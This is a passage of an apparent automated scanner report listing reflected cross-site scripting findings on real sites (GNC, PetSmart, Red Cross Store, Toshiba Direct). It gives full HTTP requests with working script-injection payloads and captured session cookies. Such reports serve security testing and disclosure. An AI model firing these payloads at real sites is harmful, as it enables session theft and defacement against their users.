Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; s_pers=%20s_nr%3D1305511477578%7C1308103477578%3B%20s_lastvisit%3D1305540969641%7C1400148969641%3B%20gpv_p6%3DMy%2520Account%253A%2520Sign-In%7C1305542769642%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DMy%25252520Account%2525253A%25252520Sign-In%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//app.gnc.com/profile/profile.cfm%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 10:19:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=rHr7NQ6hxmbbQy3CRHv3dWTTBj0czv8myJPZNQ3PhPpJhckzF2jj!-1853905486; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 80212


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtm
...[SNIP]...
<!-- === Request Query String: a33e7--><script>alert(1)</script>7d4814ce5e6=1 -->
...[SNIP]...

5.63. http://www.gnc.com/home/index.jsp [c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The value of the c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 request parameter is copied into an HTML comment. The payload 5f6c9--><script>alert(1)</script>7b7524930d was submitted in the c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=15f6c9--><script>alert(1)</script>7b7524930d HTTP/1.1
Host: www.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=p2GCNRCTz3d1h2C5cBh1h4qPJL2n70PJ4F6vnvf26JpKDT2qs10P!672921789; __g_c=w%3A0; mt.v=1.1133488502.1305543174179; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543402575%7C1308135402575%3B%20gpv_p6%3DHome%2520Page%7C1305545202577%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]; __utma=1.1693801748.1305543186.1305543186.1305543186.1; __utmb=1.3.10.1305543186; __utmc=1; __utmz=1.1305543186.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:57:42 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
Set-Cookie: browser_id=125602265854; expires=Thursday, 13-May-2021 10:57:43 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115314


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
<!-- === Request Query String: c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=15f6c9--><script>alert(1)</script>7b7524930d -->
...[SNIP]...

5.64. http://www.gnc.com/home/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /home/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c5205--><script>alert(1)</script>bb446d17c91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?c5205--><script>alert(1)</script>bb446d17c91=1 HTTP/1.1
Host: www.gnc.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; mt.v=1.1817838745.1305510198897; s_pers=%20s_nr%3D1305510199864%7C1308102199864%3B%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20gpv_p6%3DHome%2520Page%7C1305511999868%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=41-1015464695; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.1.10.1305510217

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:37 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 114340


                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
<!-- === Request Query String: c5205--><script>alert(1)</script>bb446d17c91=1 -->
...[SNIP]...

5.65. https://www.gnc.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.gnc.com
Path:   /checkout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 212ec--><script>alert(1)</script>8e54d0e09a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /checkout/index.jsp?process=orderTrackingLogin&212ec--><script>alert(1)</script>8e54d0e09a5=1 HTTP/1.1
Host: www.gnc.com
Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.2.10.1305510217; s_pers=%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20s_nr%3D1305511419003%7C1308103419003%3B%20gpv_p6%3DHome%2520Page%7C1305513219009%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.gnc.com/coreg/index.jsp%2525253Fstep%2525253Dot%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:16:20 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 97847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           
...[SNIP]...
<!-- === Request Query String: process=orderTrackingLogin&212ec--><script>alert(1)</script>8e54d0e09a5=1 -->
...[SNIP]...

5.66. http://www.petsmart.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5f832--><script>alert(1)</script>3105c4c3d6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?5f832--><script>alert(1)</script>3105c4c3d6e=1 HTTP/1.1
Host: www.petsmart.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=yYyYNQQfpxN12n6YXhzXGV2xP1vJDfygpGLyGrCyZRxwh4NLZ5r0!574538188; browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; __utmb=113636102.1.10.1305509971; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305509972462%7C1308101972462%3B%20s_lastvisit%3D1305509972464%7C1400117972464%3B%20gpv_p27%3DHome%2520Page%7C1305511772467%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __g_c=w%3A1%7Cb%3A2%7Cr%3A%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:28 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview T
...[SNIP]...
<!-- === Request Query String: isInSecureMode=false&pageType=home&5f832--><script>alert(1)</script>3105c4c3d6e=1 -->
...[SNIP]...

5.67. http://www.petsmart.com/ [rdir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /

Issue detail

The value of the rdir request parameter is copied into an HTML comment. The payload 25e8c--><script>alert(1)</script>dc42a180bb was submitted in the rdir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?rdir=1A25e8c--><script>alert(1)</script>dc42a180bb HTTP/1.1
Host: www.petsmart.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542861802%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//www.petsmart.com/_1___1305541061807%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:18:00 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview T
...[SNIP]...
<!-- === Request Query String: isInSecureMode=false&pageType=home&rdir=1A25e8c--><script>alert(1)</script>dc42a180bb -->
...[SNIP]...

5.68. https://www.petsmart.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /checkout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 105bc--><script>alert(1)</script>2e44051ff6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /checkout/index.jsp?process=login&105bc--><script>alert(1)</script>2e44051ff6d=1 HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542879295%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:19:13 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview TimeZon
...[SNIP]...
<!-- === Request Query String: isInSecureMode=true&pageType=Checkout&process=login&105bc--><script>alert(1)</script>2e44051ff6d=1 -->
...[SNIP]...

5.69. http://www.redcrossstore.org/Shopper/Product.aspx [UniqueItemId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.redcrossstore.org
Path:   /Shopper/Product.aspx

Issue detail

The value of the UniqueItemId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97b89"style%3d"x%3aexpression(alert(1))"588742d80ce was submitted in the UniqueItemId parameter. This input was echoed as 97b89"style="x:expression(alert(1))"588742d80ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Shopper/Product.aspx?UniqueItemId=46497b89"style%3d"x%3aexpression(alert(1))"588742d80ce HTTP/1.1
Host: www.redcrossstore.org
Proxy-Connection: keep-alive
Referer: http://www.redcrossstore.org/shopper/prodlist.aspx?LocationId=117
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wtlrko45dyq41xzsrrwidz55; InitialEventId=24098163; __utmz=64822188.1305511150.1.1.utmcsr=american.redcross.org|utmccn=(referral)|utmcmd=referral|utmcct=/site/PageServer; AccountType=; Pref=0; __utma=64822188.2001743552.1305511150.1305511150.1305541090.2; __utmc=64822188; __utmb=64822188.1.10.1305541090

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:24:30 GMT
Content-Length: 57128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html style="margin: 0px">
   <head>
<meta http-equiv="content-type" conten
...[SNIP]...
<a href="http://www.redcrossstore.org/Shopper/Product.aspx?UniqueItemId=46497b89"style="x:expression(alert(1))"588742d80ce" class="breadcrumbs">
...[SNIP]...

5.70. http://www.toshibadirect.com/td/b2c/laptops.to [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/laptops.to

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d835f'-alert(1)-'82064d64928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1 HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:1&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20s_invisit%3Dtrue%7C1305511850353%3B%20omtr_lv%3D1305510050391%7C1400118050391%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305511850391%3B%20s_nr%3D1305510050395%7C1308102050395%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305511850405%3B; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 297415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 27 $ $Workfile: laptops.jsp $ -->


<script language="Java
...[SNIP]...
ults('searchResultsAjax.jsp', params[2], 'resultsDiv', params[0], params[1]);
}
} else if (newLocation) {
} else {
updateFilters('multiSelectFiltersAjax.jsp', 'd835f'-alert(1)-'82064d64928=1&page=segHHO&BV_UseBVCookie=yes&target=laptops.to', 'filtersDiv', '4294967002 25 216 260', '0');
updateResults('searchResultsAjax.jsp', 'd835f'-alert(1)-'82064d64928=1&page=segHHO&BV_Use
...[SNIP]...

5.71. http://www.toshibadirect.com/td/b2c/laptops.to [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toshibadirect.com
Path:   /td/b2c/laptops.to

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc89'-alert(1)-'b678a22fbfb was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb HTTP/1.1
Host: www.toshibadirect.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:1&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20s_invisit%3Dtrue%7C1305511850353%3B%20omtr_lv%3D1305510050391%7C1400118050391%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305511850391%3B%20s_nr%3D1305510050395%7C1308102050395%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305511850405%3B; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20omtr_eVar49%3DD%253Dc49%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 296785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- $Revision: 27 $ $Workfile: laptops.jsp $ -->


<script language="Java
...[SNIP]...
hResultsAjax.jsp', params[2], 'resultsDiv', params[0], params[1]);
}
} else if (newLocation) {
} else {
updateFilters('multiSelectFiltersAjax.jsp', 'page=segHHO7dc89'-alert(1)-'b678a22fbfb&BV_UseBVCookie=yes&target=laptops.to', 'filtersDiv', '4294967002 25 216 260', '0');
updateResults('searchResultsAjax.jsp', 'page=segHHO7dc89'-alert(1)-'b678a22fbfb&BV_UseBVCookie=yes&targ
